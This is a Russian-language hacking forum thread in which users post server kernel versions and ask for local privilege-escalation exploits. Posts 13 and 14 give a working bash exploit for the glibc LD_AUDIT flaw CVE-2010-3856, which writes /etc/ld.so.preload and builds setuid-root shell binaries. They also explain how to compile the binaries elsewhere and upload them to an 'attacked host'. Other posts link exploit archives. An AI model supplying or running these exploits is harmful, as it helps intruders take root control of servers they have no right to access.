повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Konqi, 15 Oct 2010.

Thread Status:
Not open for further replies.
  1. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Ошибаешся ^_^
     
  2. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Ну приведи примеры, раз я ошибаюсь!
     
  3. antiaudomain

    antiaudomain Banned

    Joined:
    19 May 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Code:
    sh-3.2$ ln /bin/ping /var/tmp/exploit/target
    ln: creating hard link `/var/tmp/exploit/target' to `/bin/ping': Invalid cross-device link
    
    
    sh-3.2$ ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
    -rwxr-xr-x 1 root root 1693812 Apr  8 08:44 /lib/libc-2.5.so
    lrwxrwxrwx 1 root root      11 Aug  4 13:25 /lib/libc.so.6 -> libc-2.5.so
    -rwxr-xr-x 1 root root  191708 Apr  8 08:44 /lib/libcidn-2.5.so
    lrwxrwxrwx 1 root root      14 Aug  4 13:25 /lib/libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx 1 root root      17 Aug  4 13:25 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x 1 root root    6364 May  3 16:27 /lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root   45432 Apr  8 08:44 /lib/libcrypt-2.5.so
    lrwxrwxrwx 1 root root      15 Aug  4 13:25 /lib/libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x 1 root root 1295616 May  4 05:38 /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root      19 Aug  4 13:25 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root     16 Mar 10  2011 /lib/libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x 1 root root 127760 Mar  1  2011 /lib/libpcre.so.0.0.1
    ls: /lib/libme*: No such file or directory
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/mapper/VolGroup00-root
                          4.8G  3.5G  1.1G  76% /
    /dev/sda1             487M   31M  431M   7% /boot
    tmpfs                 3.9G     0  3.9G   0% /dev/shm
    /dev/sda3             487M   54M  409M  12% /tmp
    /dev/mapper/VolGroup00-var
                          387G  316G   56G  86% /var
    
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    ядра 2005ого года чем рутаются?
     
  5. SpaceMan

    SpaceMan New Member

    Joined:
    5 Jun 2011
    Messages:
    13
    Likes Received:
    4
    Reputations:
    0
    есть что нибудь на :
    Linux version 2.6.18-194.26.1.el5.028stab081.1 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Dec 23 20:17:23 MSK 2010
     
  6. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    http://www.1337day.com/

    ядра начиная с 2001г.
    Если не найдёшь, то кидай полную инфу о ядре


    Нет.
     
  7. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    есть что нибудь на:

    Linux 2.6.35.9 #1 SMP Thu Dec 9 04:26:51 CET 2010 i686
    Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011
     
  8. extrimportal

    extrimportal Member

    Joined:
    13 Nov 2010
    Messages:
    102
    Likes Received:
    36
    Reputations:
    0
    подсобите
    OS: Linux 2.6.18-194.8.1.el5.028stab070.4 #1 SMP Tue Aug 17 19:11:52 MSD 2010 x86_64
     
  9. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    Linux server 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:31:24 EDT 2011 x86_64 подскажите что-нибудь, плиз...
     
  10. Omelly

    Omelly New Member

    Joined:
    8 Sep 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    2 ресурса:
    Code:
    Linux 2.6.32.11-grsec #2 SMP Tue Apr 27 14:53:56 PDT 2010 i686
    
    Code:
    Darwin 10.8.0 Darwin Kernel Version 10.8.0: Tue Jun  7 16:32:41 PDT 2011; root:xnu-1504.15.3~1/RELEASE_X86_64 x86_64
    
    подскажите пожалуйста что-нить по этим версиям.
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 30 17:02:48 EDT 2010 i686

    Можно пробить чем-нибудь, кроме glibс? Для glibс, как я понимаю, нужен gcc, а его нет на сервере.
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Для Glibc нужен один милипиздришный бинарник, который скомпилируется на любом шелле с Gcc.
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Не понимаю, как Glibc-експлоит можно запустить без gcc? Сам эксплоит основан на компиляции же.
    Вот к примеру.


    PHP:
    #!/bin/bash
    # CVE-2010-3856
    # Author: deadbyte
     
    OUTPUT=/etc/ld.so.preload
     
    MASK
    =`umask`
    umask 0
    LD_AUDIT
    ="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUTping 2> /dev/null
    if [ ! -f $OUTPUT ]; then
      
    echo "System does not appear to be vulnerable"
      
    exit 0
    fi
    echo -$OUTPUT
    umask $MASK

    cat 
    exec.<< EOF
    #include <stdio.h>
    #include <stdlib.h>
    main(int argcchar *argv[])
    {
    if(
    argc == 2) {
    setgid(0); setuid(0);
    system(argv[1]); }
    return 
    0;
    }
    EOF
    gcc exec
    .-o exec
     
    cat 
    sh.<< EOF
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    int main ()
    {
      
    setuid(geteuid());
      
    setgid(getegid());
      
    execl("/bin/sh""bin/sh","-c""cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;"NULL);
      return 
    0;
    }
    EOF
    gcc sh
    .-o sh
     
    cat 
    libpwn.<< EOF
    #include <sys/stat.h>
    #include <unistd.h>
    uid_t getuid (void)
    {
      
    chown("$PWD/sh"00);
      
    chmod("$PWD/sh"S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
      return 
    0;
    }
    EOF
    gcc 
    -Wall -fPIC -c libpwn.c
    gcc 
    -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
     
    echo "$PWD/libpwn.so" $OUTPUT
    ping 2
    > /dev/null
    echo -$OUTPUT
    ./sh
    В этом bash-скрипте происходит вызов gcc sh.c -o sh
     
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    1. Компилируешь бинарники на другой тачке
    2. Меняешь башик примерно таким образом:
    PHP:
     #!/bin/bash 
    # CVE-2010-3856 
    # Author: deadbyte 
      
    OUTPUT=/etc/ld.so.preload 
      
    MASK
    =`umask
    umask 0 
    LD_AUDIT
    ="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUTping 2> /dev/null 
    if [ ! -f $OUTPUT ]; then 
      
    echo "System does not appear to be vulnerable" 
      
    exit 
    fi 
    echo -$OUTPUT 
    umask $MASK 
      
    echo "$PWD/libpwn.so" $OUTPUT 
    ping 2
    > /dev/null 
    echo -$OUTPUT 
    ./sh  
    Т.е. на другой тачке создай 3 файла:
    1. exec.c
    PHP:
    #include <stdio.h> 
    #include <stdlib.h> 
    main(int argcchar *argv[]) 

    if(
    argc == 2) { 
    setgid(0); setuid(0); 
    system(argv[1]); } 
    return 
    0

    2. sh.c
    PHP:
    #include <unistd.h> 
    #include <stdio.h> 
    #include <stdlib.h> 
    int main () 

      
    setuid(geteuid()); 
      
    setgid(getegid()); 
      
    execl("/bin/sh""bin/sh","-c""cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;"NULL); 
      return 
    0

    3. libpwn.c
    PHP:
    #include <sys/stat.h> 
    #include <unistd.h> 
    uid_t getuid (void

      
    chown("$PWD/sh"00); 
      
    chmod("$PWD/sh"S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_ IROTH|S_IXOTH); 
      return 
    0

    Вместо $PWD впиши каталог, в котором будешь выполнять все это на атакуемой тачке, к примеру /tmp.
    Затем выполни команды:
    1. gcc exec.c -o exec
    2. gcc sh.c -o sh
    3. gcc -Wall -fPIC -c libpwn.c
    4. gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o

    И все файлы, полученные на выходе, залей на атакуемый хост рядом с своим баш скриптиком.
     
    1 person likes this.
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Спасибо, что разжевал все.

    Жалко, что
    System does not appear to be vulnerable

    Запатчено типа?
     
  16. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    знатоки, подскажите пожалуйста сплоит на
    FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Mon Jul 12 19:23:19 UTC 2010 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
     
  17. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,184
    Likes Received:
    618
    Reputations:
    690
    2C-r-A-c-K пробуй http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+attackvector+%28Attack+Vector%29
     
    _________________________
  18. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    shell_c0de, в консоли (порта 7030) получаю циклический набор символов, в итоге nc вылетает
     
  19. ginzon

    ginzon New Member

    Joined:
    19 May 2006
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    под это есть что>?

    Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64
     
  20. MisterGood

    MisterGood New Member

    Joined:
    21 Aug 2011
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Помогите под этот найти:
    Linux 2.6.32-71.29.1.el6.x86_64 #1 SMP Mon Jun 27 19:49:27 BST 2011 x86_64 x86_64 x86_64 GNU/Linux
     
Thread Status:
Not open for further replies.